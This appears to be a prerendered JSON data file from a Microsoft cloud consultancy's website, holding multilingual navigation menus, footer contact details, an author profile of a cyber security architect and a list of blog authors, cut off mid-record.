[{"data":1,"prerenderedAt":1753},["ShallowReactive",2],{"global-header":3,"global-footer":772,"author-en-fritz-zurhorst-11e6a2cbe4b79b":810,"authors_data":833,"content-en-fritz-zurhorst":1185,"content-events-en-fritz-zurhorst":1752},{"lang":4,"home":5,"navigation":21,"meta":757,"contact":765},"de",{"folderSwitch":6,"name":9,"imgLight":10,"img":11,"languages":12},[7,8],"authors","blog","home","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"de":13,"en":17,"es":19},{"title":14,"url":15,"alias":15,"alt":16},"Home","/de","glueckkanja Logo",{"title":14,"url":18,"alt":16},"/en",{"title":14,"url":20,"alt":16},"/es",[22,195,369,506,611,624],{"name":23,"languages":24,"children":32},"workplace",{"de":25,"en":28,"es":30},{"title":26,"description":27},"Workplace","Microsoft 365-Power für smarte, sichere und flexible Arbeitswelten, die modernste Technologien und Identity Lösungen verbinden.",{"title":26,"description":29},"Microsoft 365-powered for smart, secure, and flexible workspaces, seamlessly integrating cutting-edge technologies and identity services.",{"title":26,"description":31},"Potenciado por Microsoft 365 para espacios de trabajo inteligentes, seguros y flexibles, integrando a la perfección tecnologías de vanguardia y servicios de identidad (en ingles).",[33,81,137],{"name":34,"languages":35,"children":40},"portfolio",{"de":36,"en":38,"es":39},{"title":37},"Portfolio",{"title":37},{"title":37},[41,51,61,71],{"name":42,"languages":43},"managed-intune",{"de":44,"en":47,"es":49},{"title":45,"url":46},"Managed Intune","/de/entra-intune/managed-intune",{"title":45,"url":48},"/en/entra-intune/managed-intune",{"title":45,"url":50},"/es/entra-intune/managed-intune",{"name":52,"languages":53},"managed-entra",{"de":54,"en":57,"es":59},{"title":55,"url":56},"Managed Entra","/de/entra-intune/managed-entra",{"title":55,"url":58},"/en/entra-intune/managed-entra",{"title":55,"url":60},"/es/entra-intune/managed-entra",{"name":62,"languages":63},"managed-workplace",{"de":64,"en":67,"es":69},{"title":65,"url":66},"Managed Workplace","/de/workplace/managed-workplace",{"title":65,"url":68},"/en/workplace/managed-workplace",{"title":65,"url":70},"/es/workplace/managed-workplace",{"name":72,"languages":73},"consulting-services",{"de":74,"en":77,"es":79},{"title":75,"url":76},"Consulting Services","/de/workplace/consulting-services",{"title":75,"url":78},"/en/workplace/consulting-services",{"title":75,"url":80},"/es/workplace/consulting-services",{"name":82,"languages":83,"children":88},"microsoft-365-endpoint",{"de":84,"en":86,"es":87},{"title":85},"Microsoft 365 Endpoint",{"title":85},{"title":85},[89,99,109,119,127],{"name":90,"languages":91},"microsoft-entra-suite",{"de":92,"en":95,"es":97},{"title":93,"url":94},"Microsoft Entra Suite","/de/workplace/microsoft-entra-suite",{"title":93,"url":96},"/en/workplace/microsoft-entra-suite",{"title":93,"url":98},"/es/workplace/microsoft-entra-suite",{"name":100,"languages":101},"microsoft-intune",{"de":102,"en":105,"es":107},{"title":103,"url":104},"Microsoft Intune","/de/workplace/microsoft-intune",{"title":103,"url":106},"/en/workplace/microsoft-intune",{"title":103,"url":108},"/es/workplace/microsoft-intune",{"name":110,"languages":111},"microsoft-windows",{"de":112,"en":115,"es":117},{"title":113,"url":114},"Microsoft Windows","/de/workplace/microsoft-windows",{"title":113,"url":116},"/en/workplace/microsoft-windows",{"title":113,"url":118},"/es/workplace/microsoft-windows",{"name":120,"languages":121},"windows-365-cloud-pc",{"en":122,"es":125},{"title":123,"url":124},"Windows 365 Cloud PC","/en/workplace/windows365-cloud-pc",{"title":123,"url":126},"/es/workplace/windows365-cloud-pc",{"name":128,"languages":129},"cloud-workplace-foundation",{"de":130,"en":133,"es":135},{"title":131,"url":132},"Cloud Workplace Foundation","/de/workplace/cloud-workplace-foundation",{"title":131,"url":134},"/en/workplace/cloud-workplace-foundation",{"title":131,"url":136},"/es/workplace/cloud-workplace-foundation",{"name":138,"languages":139,"children":144},"microsoft-365-collaboration",{"de":140,"en":142,"es":143},{"title":141},"Microsoft 365 Collaboration",{"title":141},{"title":141},[145,155,165,175,185],{"name":146,"languages":147},"microsoft-copilot",{"de":148,"en":151,"es":153},{"title":149,"url":150},"Microsoft 365 Copilot","/de/workplace/microsoft-365-copilot",{"title":149,"url":152},"/en/workplace/microsoft-365-copilot",{"title":149,"url":154},"/es/workplace/microsoft-365-copilot",{"name":156,"languages":157},"microsoft-teams",{"de":158,"en":161,"es":163},{"title":159,"url":160},"Teams","/de/workplace/microsoft-teams",{"title":159,"url":162},"/en/workplace/microsoft-teams",{"title":159,"url":164},"/es/workplace/microsoft-teams",{"name":166,"languages":167},"sharepoint-powerplatform",{"de":168,"en":171,"es":173},{"title":169,"url":170},"SharePoint & Power Platform","/de/workplace/sharepoint-power-platform",{"title":169,"url":172},"/en/workplace/sharepoint-power-platform",{"title":169,"url":174},"/es/workplace/sharepoint-power-platform",{"name":176,"languages":177},"exchange-online",{"de":178,"en":181,"es":183},{"title":179,"url":180},"Exchange Online","/de/workplace/exchange-online",{"title":179,"url":182},"/en/workplace/exchange-online",{"title":179,"url":184},"/es/workplace/exchange-online",{"name":186,"languages":187},"information-protection-compliance",{"de":188,"en":191,"es":193},{"title":189,"url":190},"Information Protection & Compliance","/de/workplace/information-protection-compliance",{"title":189,"url":192},"/en/workplace/information-protection-compliance",{"title":189,"url":194},"/es/workplace/information-protection-compliance",{"name":196,"languages":197,"children":205},"azure",{"de":198,"en":201,"es":203},{"title":199,"description":200},"Azure","Mit Azure Wachstum beflügeln: Cloud-Kosten senken, Effizienz steigern und Innovationen durch IaaS und PaaS vorantreiben.",{"title":199,"description":202},"Fuel growth with Azure: Cut cloud costs, boost efficiency, and drive innovation through IaaS and PaaS.",{"title":199,"description":204},"Impulse el crecimiento con Azure: Reduzca los costes de la nube, aumente la eficiencia e impulse la innovación a través de IaaS y PaaS (en ingles).",[206,233,307],{"name":207,"languages":208,"children":212},"azure-portfolio",{"de":209,"en":210,"es":211},{"title":37},{"title":37},{"title":37},[213,223],{"name":214,"languages":215},"azure-managed-services",{"de":216,"en":219,"es":221},{"title":217,"url":218},"Azure Managed Services","/de/azure/azure-managed-services",{"title":217,"url":220},"/en/azure/azure-managed-services",{"title":217,"url":222},"/es/azure/azure-managed-services",{"name":224,"languages":225},"azure-consulting",{"de":226,"en":229,"es":231},{"title":227,"url":228},"Azure Consulting","/de/azure/azure-consulting",{"title":227,"url":230},"/en/azure/azure-consulting",{"title":227,"url":232},"/es/azure/azure-consulting",{"name":234,"languages":235,"children":241},"azure-scenarios",{"de":236,"en":238,"es":240},{"title":237},"Szenarios",{"title":239},"Scenarios",{"title":239},[242,253,264,275,287,297],{"name":243,"languages":244},"plan-your-cloud",{"de":245,"en":248,"es":251},{"title":246,"url":247},"Planen Sie Ihre Cloud","/de/azure/plan-your-cloud",{"title":249,"url":250},"Plan your Cloud","/en/azure/plan-your-cloud",{"title":249,"url":252},"/es/azure/plan-your-cloud",{"name":254,"languages":255},"migrate-to-the-cloud",{"de":256,"en":259,"es":262},{"title":257,"url":258},"Migriere deine Cloud","/de/azure/migrate-to-the-cloud",{"title":260,"url":261},"Migrate to the cloud","/en/azure/migrate-to-the-cloud",{"title":260,"url":263},"/es/azure/migrate-to-the-cloud",{"name":265,"languages":266},"innovate-your-business",{"de":267,"en":270,"es":273},{"title":268,"url":269},"Erneuere dein Business","/de/azure/innovate-your-business",{"title":271,"url":272},"Innovate your business","/en/azure/innovate-your-business",{"title":271,"url":274},"/es/azure/innovate-your-business",{"name":276,"languages":277},"vmware-exit",{"de":278,"en":281,"es":284},{"title":279,"url":280},"Überdenke deine VMware-Strategie","/de/azure/vmware-exit",{"title":282,"url":283},"Rethink your VMware strategy","/en/azure/vmware-exit",{"title":285,"url":286},"Replantea tu estrategia de VMware","/es/azure/vmware-exit",{"name":288,"languages":289},"azure-cloud-adoption-framework",{"de":290,"en":293,"es":295},{"title":291,"url":292},"Cloud Adoption Framework","/de/azure/cloud-adoption-framework",{"title":291,"url":294},"/en/azure/cloud-adoption-framework",{"title":291,"url":296},"/es/azure/cloud-adoption-framework",{"name":298,"languages":299},"azure-cloud-competence-center",{"de":300,"en":303,"es":305},{"title":301,"url":302},"Cloud Competence Center","/de/azure/cloud-competence-center",{"title":301,"url":304},"/en/azure/cloud-competence-center",{"title":301,"url":306},"/es/azure/cloud-competence-center",{"name":308,"languages":309,"children":314},"azure-practices",{"de":310,"en":312,"es":313},{"title":311},"Practices",{"title":311},{"title":311},[315,325,335,345,354,359],{"name":316,"languages":317},"azure-foundation",{"de":318,"en":321,"es":323},{"title":319,"url":320},"Azure Foundation","/de/azure/azure-foundation",{"title":319,"url":322},"/en/azure/azure-foundation",{"title":319,"url":324},"/es/azure/azure-foundation",{"name":326,"languages":327},"azure-ai-foundation",{"de":328,"en":331,"es":333},{"title":329,"url":330},"Azure AI Foundation","/de/azure/azure-ai-foundation",{"title":329,"url":332},"/en/azure/azure-ai-foundation",{"title":329,"url":334},"/es/azure/azure-ai-foundation",{"name":336,"languages":337},"azure-data-foundation",{"de":338,"en":341,"es":343},{"title":339,"url":340},"Azure Data Foundation","/de/azure/azure-data-foundation",{"title":339,"url":342},"/en/azure/azure-data-foundation",{"title":339,"url":344},"/es/azure/azure-data-foundation",{"name":316,"languages":346},{"de":347,"en":350,"es":352},{"title":348,"url":349},"Azure Container Foundation","/de/azure/azure-container-foundation",{"title":348,"url":351},"/en/azure/azure-container-foundation",{"title":348,"url":353},"/es/azure/azure-container-foundation",{"name":128,"languages":355},{"de":356,"en":357,"es":358},{"title":131,"url":132},{"title":131,"url":134},{"title":131,"url":136},{"name":360,"languages":361},"dark-tenant",{"de":362,"en":365,"es":367},{"title":363,"url":364},"Managed Dark Tenant","/de/azure/managed-dark-tenant",{"title":363,"url":366},"/en/azure/managed-dark-tenant",{"title":363,"url":368},"/es/azure/managed-dark-tenant",{"name":370,"languages":371,"children":388},"security",{"de":372,"en":380,"es":384},{"title":373,"description":374,"emergency":375},"Security","Wachsamkeit in der Cloud mit einem preisgekrönten 24/7 Managed Service, Incident Response und modernstem Schutz für Ihre Infrastruktur.",{"text":376,"href":377,"skin":378,"icon":379},"Under Attack?","/de/security/are-you-under-attack","primary","emergency",{"title":373,"description":381,"emergency":382},"Vigilance in the cloud with an award-winning 24/7 managed service, incident response and state-of-the-art protection for your infrastructure.",{"text":376,"href":383,"skin":378,"icon":379},"/en/security/are-you-under-attack",{"title":373,"description":385,"emergency":386},"Vigilancia en la nube con un galardonado servicio gestionado 24/7, respuesta ante incidentes y protección de vanguardia para su infraestructura (en ingles).",{"text":376,"href":387,"skin":378,"icon":379},"/es/security/are-you-under-attack",[389,418,451],{"name":390,"children":391},"security-security-consulting",[392,402,408],{"name":393,"languages":394},"managed-red-tenant",{"de":395,"en":398,"es":400},{"title":396,"url":397},"Managed Red Tenant","/de/security/managed-red-tenant",{"title":396,"url":399},"/en/security/managed-red-tenant",{"title":396,"url":401},"/es/security/managed-red-tenant",{"name":360,"languages":403},{"de":404,"en":406,"es":407},{"title":405,"url":364},"Dark Tenant",{"title":405,"url":366},{"title":405,"url":368},{"name":409,"languages":410},"security-consulting",{"de":411,"en":414,"es":416},{"title":412,"url":413},"Security Consulting","/de/security/security-consulting",{"title":412,"url":415},"/en/security/security-consulting",{"title":412,"url":417},"/es/security/security-consulting",{"name":419,"children":420},"security-cloud-security-operations-center",[421,431,441],{"name":422,"languages":423},"cloud-security-operations-center",{"de":424,"en":427,"es":429},{"title":425,"url":426},"Cloud Security Operations Center","/de/security/cloud-security-operations-center",{"title":425,"url":428},"/en/security/cloud-security-operations-center",{"title":425,"url":430},"/es/security/cloud-security-operations-center",{"name":432,"languages":433},"global-secure-access",{"de":434,"en":437,"es":439},{"title":435,"url":436},"Global Secure Access","/de/security/global-secure-access",{"title":435,"url":438},"/en/security/global-secure-access",{"title":435,"url":440},"/es/security/global-secure-access",{"name":442,"languages":443},"my-work-id",{"de":444,"en":447,"es":449},{"title":445,"url":446},"MyWorkID","/de/security/my-work-id",{"title":445,"url":448},"/en/security/my-work-id",{"title":445,"url":450},"/es/security/my-work-id",{"name":452,"children":453},"security-preventive-services",[454,464,474,484,496],{"name":455,"languages":456},"preventive-services",{"de":457,"en":460,"es":462},{"title":458,"url":459},"Preventive Services","/de/security/preventive-services",{"title":458,"url":461},"/en/security/preventive-services",{"title":458,"url":463},"/es/security/preventive-services",{"name":465,"languages":466},"data-security-services",{"de":467,"en":470,"es":472},{"title":468,"url":469},"Data Security Service","/de/security/data-security-service",{"title":468,"url":471},"/en/security/data-security-service",{"title":468,"url":473},"/es/security/data-security-service",{"name":475,"languages":476},"security-copilot-agents",{"de":477,"en":480,"es":482},{"title":478,"url":479},"Security Copilot Agents","/de/security/security-copilot-agents",{"title":478,"url":481},"/en/security/security-copilot-agents",{"title":478,"url":483},"/es/security/security-copilot-agents",{"name":485,"languages":486},"nis2",{"de":487,"en":490,"es":493},{"title":488,"url":489},"NIS2 technisch umsetzen","/de/security/red-dark-tenant-nis2",{"title":491,"url":492},"Implementing NIS2","/en/security/red-dark-tenant-nis2",{"title":494,"url":495},"Implementación técnica de NIS2","/es/security/red-dark-tenant-nis2",{"name":497,"languages":498},"sentinel-data-lake",{"de":499,"en":502,"es":504},{"title":500,"url":501},"Sentinel Data Lake","/de/security/sentinel-data-lake",{"title":500,"url":503},"/en/security/sentinel-data-lake",{"title":500,"url":505},"/es/security/sentinel-data-lake",{"name":507,"languages":508,"children":518},"products",{"de":509,"en":512,"es":515},{"title":510,"description":511},"Produkte","Innovative Companion-Produkte für eine vollständig sichere, 100% cloud-native Microsoft-Umgebung, die Zusammenarbeit, Netzwerkauthentifizierung und Softwareverwaltung verbessern.",{"title":513,"description":514},"Products","Innovative companion products for a completely secure, 100% cloud-native Microsoft environment that enhance collaboration, network authentication and software management.",{"title":516,"description":517},"Productos","Innovadores productos complementarios para un entorno Microsoft completamente seguro y 100% nativo de la nube que mejoran la colaboración, la autenticación en red y la gestión del software (en ingles).",[519,572],{"name":520,"products":521,"children":522},"lorem ipsum 1",true,[523,536,548,560],{"name":524,"img":525,"target":526,"languages":527},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"de":528,"en":532,"es":534},{"title":529,"subtitle":530,"url":531},"RealmJoin","Cloudbasierte Softwareverteilung","https://www.realmjoin.com",{"title":529,"subtitle":533,"url":531},"Cloudbased Software distribution",{"title":529,"subtitle":535,"url":531},"Distribución de software en la nube",{"name":537,"img":538,"target":526,"languages":539},"scepman","products/scepman/scepman-nav-logo.svg",{"de":540,"en":544,"es":546},{"title":541,"subtitle":542,"url":543},"SCEPman","Zertifikatsverteilung aus der Cloud","https://www.scepman.com",{"title":541,"subtitle":545,"url":543},"Certificate distribution from the cloud",{"title":541,"subtitle":547,"url":543},"Distribución de certificados desde la nube",{"name":549,"img":550,"target":526,"languages":551},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"de":552,"en":556,"es":558},{"title":553,"subtitle":554,"url":555},"KONNEKT","Arbeiten Sie lokal mit Ihren Office 365-Daten","https://www.konnekt.io",{"title":553,"subtitle":557,"url":555},"Work with your local office 365 data",{"title":553,"subtitle":559,"url":555},"Trabaje con sus datos locales de office 365",{"name":561,"img":562,"target":526,"languages":563},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"de":564,"en":568,"es":570},{"title":565,"subtitle":566,"url":567},"RealMigrator","Migrieren Sie alle Ihre Datenressourcen","https://www.realmigrator.com",{"title":565,"subtitle":569,"url":567},"Migrate your data from one server to another",{"title":565,"subtitle":571,"url":567},"Migre sus datos de un servidor a otro",{"name":573,"products":521,"children":574},"lorem ipsum 2",[575,587,599],{"name":576,"img":577,"target":526,"languages":578},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"de":579,"en":583,"es":585},{"title":580,"subtitle":581,"url":582},"TerraProvider","Terraform Provider für Microsoft 365","https://www.terraprovider.com",{"title":580,"subtitle":584,"url":582},"Terraform Provider for Microsoft 365",{"title":580,"subtitle":586,"url":582},"Terraform Provider para Microsoft 365",{"name":588,"img":589,"target":526,"languages":590},"radiusaas","products/radius/radius-nav-logo.svg",{"de":591,"en":595,"es":597},{"title":592,"subtitle":593,"url":594},"RADIUSaaS","Authentifizierung für Ihr Netzwerk","https://www.radius-as-a-service.com",{"title":592,"subtitle":596,"url":594},"Authentication for your network",{"title":592,"subtitle":598,"url":594},"Autenticación para su red",{"name":600,"img":601,"target":526,"languages":602},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"de":603,"en":607,"es":609},{"title":604,"subtitle":605,"url":606},"Unified Contacts","Finden Sie alle Ihre Kontakte in Microsoft Teams","https://www.unified-contacts.com",{"title":604,"subtitle":608,"url":606},"Find contacts in Microsoft Teams",{"title":604,"subtitle":610,"url":606},"Buscar contactos en Microsoft Teams",{"name":612,"languages":613},"casestudies",{"de":614,"en":618,"es":621},{"title":615,"description":616,"url":617},"Case Studies","Pionier in der Cloud: Ihr Top-Microsoft-Partner für umfassende Cloud-Lösungen mit einem Blueprint-basierten Ansatz und Infrastructure-as-Code-Expertise.","/de/casestudies",{"title":615,"description":619,"url":620},"Pioneer in the Cloud: Your top Microsoft partner for comprehensive cloud solutions with a Blueprint-based approach and Infrastructure-as-Code expertise.","/en/casestudies",{"title":615,"description":622,"url":623},"Pionero en la Cloud: Su principal socio de Microsoft para soluciones integrales en la nube con un enfoque basado en Blueprint y experiencia en infraestructura como código (en ingles).","/es/casestudies",{"name":625,"languages":626,"children":633},"company",{"de":627,"en":629,"es":631},{"title":628,"description":616},"Unternehmen",{"title":630,"description":619},"Company",{"title":632,"description":622},"Empresa",[634,690,727],{"name":635,"languages":636,"children":643},"company-about-us",{"de":637,"en":639,"es":641},{"title":638},"Über Uns",{"title":640},"About us",{"title":642},"Acerca de nosotros",[644,655,667,679],{"name":645,"languages":646},"company-facts-figures",{"de":647,"en":650,"es":652},{"title":648,"url":649},"Facts & Figures","/de/company/facts-and-figures",{"title":648,"url":651},"/en/company/facts-and-figures",{"title":653,"url":654},"Datos y cifras","/es/company/facts-and-figures",{"name":656,"languages":657},"company-contact",{"de":658,"en":661,"es":664},{"title":659,"url":660},"Kontakt & Standorte","/de/company/contact-and-locations",{"title":662,"url":663},"Contact & Locations","/en/company/contact-and-locations",{"title":665,"url":666},"Contacto y ubicaciones","/es/company/contact-and-locations",{"name":668,"languages":669},"switzerland",{"de":670,"en":673,"es":676},{"title":671,"url":672},"glueckkanja Schweiz","/de/company/switzerland",{"title":674,"url":675}," glueckkanja Switzerland","/en/company/switzerland",{"title":677,"url":678},"glueckkanja Suiza","/es/company/switzerland",{"name":680,"languages":681},"austria",{"de":682,"en":685,"es":688},{"title":683,"url":684},"glueckkanja Österreich","/de/company/austria",{"title":686,"url":687},"glueckkanja Austria","/en/company/austria",{"title":686,"url":689},"/es/company/austria",{"name":691,"languages":692,"children":699},"company-career",{"de":693,"en":695,"es":697},{"title":694},"Karriere",{"title":696},"Career",{"title":698},"Carreras",[700,712,718],{"name":701,"languages":702},"company-career-overview",{"de":703,"en":706,"es":709},{"title":704,"url":705},"Karriere Übersicht","/de/career",{"title":707,"url":708},"Career overview","/en/career",{"title":710,"url":711},"Carrera general","/es/career",{"name":713,"languages":714},"company-young-professionals",{"de":715},{"title":716,"url":717},"Young Professionals","/de/young-professionals",{"name":719,"languages":720},"company-jobs",{"de":721,"en":724},{"title":722,"url":723},"Stellenanzeigen","/de/job-offers",{"title":725,"url":726},"Job offers","/en/job-offers",{"name":728,"languages":729,"children":736},"company-latest",{"de":730,"en":732,"es":734},{"title":731},"Aktuelles",{"title":733},"Latest",{"title":735},"Últimas novedades",[737,747],{"name":738,"languages":739},"company-blog",{"de":740,"en":743,"es":745},{"title":741,"url":742},"Blog","/de/blog",{"title":741,"url":744},"/en/blog",{"title":741,"url":746},"/es/blog",{"name":738,"languages":748},{"de":749,"en":752,"es":754},{"title":750,"url":751},"Events","/de/events",{"title":750,"url":753},"/en/events",{"title":755,"url":756},"Eventos","/es/events",[758],{"name":759,"languages":760},"career-meta",{"de":761,"en":763,"es":764},{"title":694,"url":705,"active":762},false,{"title":696,"url":708,"active":762},{"title":696,"url":711,"active":762},{"languages":766},{"de":767,"en":769,"es":771},{"title":768,"url":660,"active":762},"Kontakt",{"title":770,"url":663,"active":762},"Contact",{"title":770,"url":666,"active":762},{"data":773},{"bgColor":774,"number":775,"mail":776,"brandLogos":777,"logos":778,"links":782,"linksEn":792,"linksEs":801},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[779],{"img":10,"alt":16,"url":780,"class":781},"index.html","max-w-19rem",[783,786,789],{"title":784,"url":785},"Datenschutz","/de/privacy",{"title":787,"url":788},"Impressum","/de/imprint",{"title":790,"url":791},"No Cookies","/de/cookies",[793,796,799],{"title":794,"url":795},"Privacy","/en/privacy",{"title":797,"url":798},"Imprint","/en/imprint",{"title":790,"url":800},"/en/cookies",[802,804,807],{"title":803,"url":795},"Privacidad",{"title":805,"url":806},"Imprimir","/es/imprint",{"title":808,"url":809},"Sin Cookies","/es/cookies",{"id":811,"title":812,"body":813,"description":819,"extension":824,"meta":825,"name":812,"navigation":521,"otherLanguages":826,"path":829,"seo":830,"stem":831,"__hash__":832},"authors/fritz-zurhorst.md","Fritz Zurhorst",{"type":814,"value":815,"toc":820},"minimal",[816],[817,818,819],"p",{},"Friedemann Zurhorst ist Cyber Security Architect bei glueckkanja. Sein Schwerpunkt liegt auf Identity Security: Er prüft gewachsene Active-Directory-Umgebungen in AD Security Reviews, begleitet Kunden bei der Einführung starker Authentifizierung und klassifiziert Privilegien nach dem Enterprise Access Model, unter anderem in EntraOps-Workshops. Dazu kommen Platform Engineering und die Arbeit am Managed Red Tenant, mit dem glueckkanja Kunden eine sichere administrative Umgebung bereitstellt.",{"title":821,"searchDepth":822,"depth":822,"links":823},"",2,[],"md",{},{"en":827,"es":828},"Friedemann Zurhorst is a Cyber Security Architect at glueckkanja. His focus is identity security. He assesses grown Active Directory environments in AD security reviews, guides customers through the rollout of strong authentication, and classifies privileges along the Enterprise Access Model, among other things in EntraOps workshops. On top of that comes platform engineering as well as work on the Managed Red Tenant, with which glueckkanja provides customers with a secure administrative environment.","Friedemann Zurhorst es Cyber Security Architect en glueckkanja. Su especialidad es la seguridad de identidades. Evalúa entornos de Active Directory que han crecido con los años en AD Security Reviews, acompaña a los clientes en la implantación de una autenticación fuerte y clasifica los privilegios según el Enterprise Access Model, entre otros en los workshops de EntraOps. A ello se suman el platform engineering y el trabajo en el Managed Red Tenant, con el que glueckkanja proporciona a sus clientes un entorno administrativo seguro.","/fritz-zurhorst",{"title":812,"description":819},"fritz-zurhorst","yTWYBuakiVgG0fOBfYGuGElCXJq-aXwGfsL3MRdvuWc",{"id":834,"extension":835,"meta":836,"stem":7,"__hash__":1184},"authors_data/authors.json","json",{"path":837,"Fritz Zurhorst":838,"Alexander Schlindwein":843,"Sophie Luna":849,"Nadine Klein":857,"Karsten Kleinschmidt":863,"Julian Wendt":869,"Holger Bunkradt":874,"Ralf Mania":880,"Oliver Kieselbach":886,"Steffen Schwerdtfeger":892,"Gunnar Winter":900,"Jan Petersen":905,"Thorsten Kunzi":910,"Moritz Pohl":914,"Thorben Pöschus":919,"Christoph Hannebauer":925,"Marco Scheel":929,"Christopher Brumm":934,"Florian Klante":941,"Niklas Bachmann":946,"Nils Krautkrämer":951,"Patrick Treptau":957,"Peter Beckendorf":962,"Patrick Sobau":967,"Jörg Wunderlich":972,"Michael Breither":976,"Christian Kanja":981,"Zeba Hoffmann":987,"Jochen Fröhlich":992,"Jan Geisbauer":996,"Gerrit Reinke":1007,"Christian Kordel":1013,"Stephan Wälde":1017,"Carolin Kanja":1022,"Adrian Ritter":1028,"Marvin Bangert":1033,"Thorsten Pickhan":1039,"Christian Lorenz":1045,"Denis Böhm":1050,"Fabian Bader":1055,"Juan Jose Fernandez Perez":1061,"Mahschid Sayyar":1066,"Benjamin Dassow":1071,"Markus Walschburger":1076,"Jonathan Haist":1081,"Daniel Rohregger":1086,"Thomas Naunheim":1091,"Florian Stöckl":1096,"Pascal Asch":1101,"Markus Kättner":1106,"Anna Ulbricht":1113,"Annette Brauns":1120,"body":1127,"title":1183,"Thorben Poeschus":919,"Nils Krautkraemer":951,"Joerg Wunderlich":972,"Jochen Froehlich":992,"Stephan Waelde":1017,"Denis Boehm":1050,"Florian Stoeckl":1096,"Markus Kaettner":1106},"/authors",{"display_name":812,"avatar":839,"permalink":840,"linkedin":841,"imageOffsetTop":842},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":844,"avatar":845,"permalink":846,"twitter":847,"linkedin":848},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":850,"avatar":851,"permalink":852,"twitter":853,"linkedin":854,"imageOffsetLeft":855,"imageOffsetTop":856},"Sophie Luna","people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":858,"avatar":859,"permalink":860,"twitter":861,"linkedin":862,"imageOffsetTop":842},"Nadine Klein","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern",{"display_name":864,"avatar":865,"permalink":866,"twitter":867,"linkedin":868},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":870,"avatar":871,"permalink":872,"linkedin":873},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":875,"avatar":876,"permalink":877,"linkedin":878,"twitter":879},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":881,"avatar":882,"permalink":883,"linkedin":884,"twitter":885},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":887,"avatar":888,"permalink":889,"linkedin":890,"twitter":891},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":893,"avatar":894,"permalink":895,"linkedin":896,"twitter":897,"imageOffsetTop":898,"imageOffsetLeft":899},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":901,"avatar":902,"permalink":903,"twitter":853,"linkedin":904},"Gunnar Winter","people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":906,"avatar":907,"permalink":908,"twitter":853,"linkedin":909},"Jan Petersen","people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":911,"avatar":912,"permalink":913,"twitter":853,"linkedin":904,"imageOffsetTop":842},"Thorsten Kunzi","people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":915,"avatar":916,"permalink":917,"twitter":853,"linkedin":918},"Dr. Moritz Pohl","people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":920,"avatar":921,"permalink":922,"twitter":923,"linkedin":924},"Thorben Pöschus","people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":926,"avatar":927,"permalink":928,"twitter":853,"linkedin":904,"imageOffsetTop":842},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":930,"avatar":931,"permalink":932,"twitter":933,"linkedin":933},"Marco Scheel","people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":935,"avatar":936,"permalink":937,"twitter":938,"linkedin":939,"imageOffsetTop":940},"Christopher Brumm","people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":942,"avatar":943,"permalink":944,"linkedin":945,"twitter":853},"Florian Klante","people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":947,"avatar":948,"permalink":949,"linkedin":950,"twitter":853},"Niklas Bachmann","people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":952,"avatar":953,"permalink":954,"twitter":955,"linkedin":956},"Nils Krautkrämer","people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":958,"avatar":959,"permalink":960,"linkedin":961,"twitter":853},"Patrick Treptau","people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":963,"avatar":964,"permalink":965,"linkedin":966,"twitter":853,"imageOffsetTop":842},"Peter Beckendorf","people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":968,"avatar":969,"permalink":970,"linkedin":971,"twitter":853},"Patrick Sobau","people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":973,"avatar":974,"permalink":975,"twitter":853},"Jörg Wunderlich","people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":977,"avatar":978,"permalink":979,"twitter":853,"linkedin":980},"Michael Breither","people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":982,"avatar":983,"permalink":984,"twitter":985,"linkedin":986},"Christian Kanja","people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":988,"avatar":989,"permalink":990,"linkedin":991,"twitter":853},"Zeba Hoffmann","people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":993,"avatar":994,"permalink":995,"twitter":853,"linkedin":904},"Jochen 